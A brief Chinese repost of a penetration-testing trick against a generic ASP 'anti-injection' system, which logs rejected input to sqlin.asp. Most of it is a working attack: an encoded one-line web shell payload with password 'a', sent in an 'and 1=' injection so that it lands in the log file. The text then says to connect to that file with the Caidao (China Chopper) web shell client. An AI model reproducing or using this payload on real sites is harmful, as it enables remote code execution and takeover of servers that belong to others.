通用防注入系统getshell【转载】

原文链接：https://paper.seebug.org/92/
通用防注入系统getshell

相信许多朋友渗透测试都遇到过这种情况

系统做了数据提交记录，我们通过阅读类似程序的源码得知数据记录在sqlin.asp

于是想到直接提交一句话木马。但是没有成功

``````

┼攠數畣整爠煥敵瑳∨≡┩愾          

 密码 a  (加密方式是:ANSI->Unicode)提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾

``````

菜刀连接sqlin.php即可